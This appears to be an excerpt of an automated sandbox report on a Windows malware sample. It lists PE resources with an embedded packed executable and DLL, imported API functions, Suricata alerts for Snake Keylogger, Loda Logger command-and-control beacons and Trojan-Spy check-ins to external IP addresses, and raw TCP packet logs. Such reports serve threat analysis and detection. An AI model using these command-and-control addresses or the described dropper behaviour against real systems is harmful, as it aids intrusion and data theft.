                                                                                                                                                      RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                                      RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                                                                      RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                                                                      RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                                                                      RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                                                                      RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                                                                      RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                                      RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                      RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                                                      RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                      RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                                                      RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                                                      RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                                                      RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                                                      RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                      RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                                                      RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                      RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                                                      RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.12171669793621014
                                                                                                                                                      RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                                                                      RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                                                                      RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                                                                      RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                                                                      RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                                                                      RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                                                                      RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                                                                      RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                                                                      RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                                                                      RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                                                                      RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                                                                      RT_STRING0xb67b80xdcdata0.6
                                                                                                                                                      RT_STRING0xb68940x320data0.45125
                                                                                                                                                      RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                                                                      RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                                                                      RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                                                                      RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                                                                      RT_STRING0xb74040x378data0.41103603603603606
                                                                                                                                                      RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                                                                      RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                                                                      RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                                                                      RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                                                      RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                                                      RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                                                      RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                                                      RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                                                      RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                                                      RT_RCDATA0xb8e040x10data1.5
                                                                                                                                                      RT_RCDATA0xb8e140x129400PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed0.6519241333007812
                                                                                                                                                      RT_RCDATA0x1e22140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                                                      RT_RCDATA0x1e22180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                                                      RT_RCDATA0x1e5e180x64cdata0.5998759305210918
                                                                                                                                                      RT_RCDATA0x1e64640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                                                      RT_RCDATA0x1e65b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                                                      RT_GROUP_CURSOR0x1ead8c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                      RT_GROUP_CURSOR0x1eada00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                      RT_GROUP_CURSOR0x1eadb40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                      RT_GROUP_CURSOR0x1eadc80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                      RT_GROUP_CURSOR0x1eaddc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                      RT_GROUP_CURSOR0x1eadf00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                      RT_GROUP_CURSOR0x1eae040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                      RT_GROUP_ICON0x1eae180x14dataTurkishTurkey1.1
                                                                                                                                                      RT_VERSION0x1eae2c0x304dataTurkishTurkey0.42875647668393785

                                                                                                                                                      Imports

                                                                                                                                                      DLLImport
                                                                                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                      advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                                                                      kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                                      user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                      ole32.dllCLSIDFromString
                                                                                                                                                      kernel32.dllSleep
                                                                                                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                      ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                                      oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                      shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                                                      wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                                                      shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                                                      advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                                                      wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                                                      netapi32.dllNetbios

                                                                                                                                                      Possible Origin

                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                      TurkishTurkey

                                                                                                                                                      Network Behavior

                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150136172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1149797172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150144172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1149903172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150009172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150149172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150148172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150141172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150150172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150102172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150151172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150147172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:14.879330+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150140172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:29.697550+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149762172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:29.711379+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149761172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:30.160355+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.114976969.42.215.25280TCP
                                                                                                                                                      2024-12-30T11:25:30.983358+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149775172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:30.991855+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149776172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:31.580437+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.1149797172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:31.580437+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1149797172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:31.958178+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149787172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:32.070859+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149788172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:33.036472+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149799172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:33.052311+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149802172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:34.713134+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149825172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:34.723403+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149826172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:35.715047+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149839172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:35.842350+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149837172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:36.721748+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149845172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:36.816313+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149847172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:37.730917+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149857172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:37.830902+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149859172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:39.324642+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149878172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:39.326532+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149879172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:40.297532+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149892172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:40.309514+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149890172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:40.620474+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1149903172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:41.331630+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.1149900172.217.18.110443TCP
                                                                                                                                                      2024-12-30T11:25:49.754340+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150009172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:25:58.794699+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150102172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:07.839451+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.1150136172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:07.839451+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150136172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:16.936177+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150140172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:25.963712+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150141172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:34.979812+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150144172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:44.005613+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150147172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:53.026577+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.1150148172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:26:53.026577+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150148172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:27:02.074137+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150149172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:27:11.135835+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150150172.111.138.1005552TCP
                                                                                                                                                      2024-12-30T11:27:20.198693+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1150151172.111.138.1005552TCP

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Dec 30, 2024 11:25:28.590091944 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:28.590111971 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:28.590128899 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:28.590152979 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:28.590229988 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:28.590327978 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:28.602109909 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:28.602159977 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:28.602255106 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:28.602274895 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.208872080 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.208946943 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.209703922 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.209764004 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.220026016 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.220122099 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.220757961 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.220834970 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.411706924 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.411737919 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.411983967 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.412034988 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.415038109 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.415055990 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.415357113 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.415493965 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.415813923 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.416273117 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.459331989 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.459333897 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.575335026 CET4976980192.168.2.1169.42.215.252
                                                                                                                                                      Dec 30, 2024 11:25:29.580270052 CET804976969.42.215.252192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.580369949 CET4976980192.168.2.1169.42.215.252
                                                                                                                                                      Dec 30, 2024 11:25:29.590995073 CET4976980192.168.2.1169.42.215.252
                                                                                                                                                      Dec 30, 2024 11:25:29.595887899 CET804976969.42.215.252192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.697552919 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.698816061 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.698829889 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.698858976 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.698959112 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.711379051 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.712085962 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.712097883 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.712140083 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.712193012 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.712232113 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.712264061 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.712286949 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.924916983 CET49762443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.924935102 CET44349762172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:29.993814945 CET49761443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:29.993839025 CET44349761172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.004292965 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.004333973 CET44349775172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.004511118 CET49775443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.006248951 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.006315947 CET44349776172.217.18.110192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.006381035 CET49776443192.168.2.11172.217.18.110
                                                                                                                                                      Dec 30, 2024 11:25:30.006854057 CET49776443192.168.2.11172.217.18.110
